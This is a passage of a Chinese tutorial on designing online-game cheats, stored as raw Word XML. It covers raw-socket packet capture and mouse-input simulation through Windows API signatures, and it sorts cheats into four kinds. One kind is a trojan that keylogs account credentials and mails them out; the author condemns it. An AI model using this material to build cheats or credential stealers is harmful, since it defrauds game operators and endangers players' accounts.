    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bind(m_hSocket, LocalAddr, sizeof(LocalAddr))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSAIoctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的输入输出组件，其用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">INTEGER WSAIoctl(s:INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">dwIoControlCode : INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>lpvInBuffer :INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">cbInBuffer : INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>lpvOutBuffer : INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">cbOutBuffer: INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">lpcbBytesReturned : INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">lpOverlapped : INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>lpCompletionRoutine : INTEGER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面做死循环，在死循环块里，来实现数据的接收。但是徇环中间要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sleep()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做延时，不然程序会出错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在循环块里，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来接收数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">INTEGER recv (s : INTEGER, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">buffer:Array[0..4095] of byte, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>length : INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>flags : INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里就是我们接收回来的数据了，如果我们想要知道数据是什么地方发来的，那么，我们要定义一定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包结构，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CopyMemory()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面读出来就可以了，不过读出来的是十六进制的数据需要转换一下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　看了封包捕获的全过程序，对你是不是有点起发，然而在这里要告诉大家的是封包的获得是很容易的，但是许多游戏的封包都是加密的，如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorni*ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四种网络游戏外挂的设计方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在几年前我看到别人玩网络游戏用上了外挂，做为程序员的我心里实在是不爽，想搞清楚这到底是怎么回事。就拿了一些来研究，小有心得，拿出来与大家共享，外挂无非就是分几种罢了（依制作难度）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、动作式，所谓动作式，就是指用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发命令给窗口或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制鼠标、键盘等，使游戏里的人物进行流动或者攻击，最早以前的“石器”外挂就是这种方式。（这种外挂完全是垃圾，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TMD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要会一点点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人都知道该怎么做，不过这种外挂也是入门级的好东东，虽然不能提高你的战斗力，但是可以提高你的士气）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、本地修改式，这种外挂跟传统上的一些游戏修改器没有两样，做这种外挂在编程只需要对内存地址有一点认识并且掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以实现，“精灵”的外挂这是这种方式写成的，它的难点在于找到那些地址码，找地址一般地要借助于别人的工具，有的游戏还有双码校</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>验，正正找起来会比较困难。（这种外挂，比上一种有一点点难度，但是这种外挂做起来能够用，也是有一定难度的啦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这种外挂可以很快提升你对内存地址的理解及应用，是你编程技术提高的好东东）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、木马式，这种外挂的目的是帮外挂制作者偷到用户的密码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TMD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，“烂”就一个字，不过要知已知彼所以还是要谈一下啦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），做这种外挂有一定的难度，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HOOK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或键盘监视技术做底子，才可以完成，它的原理是先首截了用户的帐号或密码，然后发到指定邮箱。（我以前写过这样的东东，但是从来没有用过，我知道这种东东很不道德，所以以后千万别用呀！）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、加速式，这种外挂可以加快游戏的速度……（对不起大家，这种东东我没有实际做过，所以不能妄自评，惭愧）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　这几种外挂之中，前三种可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等语言比较好实现，后两种则要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等底层支持比较好的编程工具才好实现。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　动作式外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先，先来谈一下动作式的外挂，这也是我第一次写外挂时做的最简单的一种。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　记得还在“石器”时代的时候，我看到别人挂着一种软件（外挂）人物就可以四外游走（当时我还不知道外挂怎么回事），于是找了这种软件过来研究（拿来后才听别人说这叫外挂），发现这种东东其实实现起来并不难，仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已，看后就有实现这功能的冲动，随后跑到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上看了一些资料，发现这种实现这几个功能，只需要几个简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数就可以搞定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、首先我们要知道现在鼠标的位置（为了好还原现在鼠标的位置）所以我们就要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetCursorPos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它的使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">BOOL GetCursorPos( </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">LPPOINT lpPoint // address of structure for cursor position </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们把鼠标的位置移到要到人物走到的地方，我们就要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetCursorPos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来移动鼠标位置，它的使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>BOOL SetCursorPos(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">int X, // horizontal position </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>int Y // vertical position</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、模拟鼠标发出按下和放开的动作，我们要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mouse_event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来实现，具休使用方法用下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>VOID mouse_event(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwFlags, // flags specifying various motion/click variants</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dx, // horizontal mouse position or position change</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dy, // vertical mouse position or position change</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwData, // amount of wheel movement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>DWORD dwExtraInfo // 32 bits of application-defined information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dwFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处，可用的事件很多如移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MOUSEEVENTF_MOVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，左键按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MOUSEEVENTF_LEFTDOWN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，左键放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
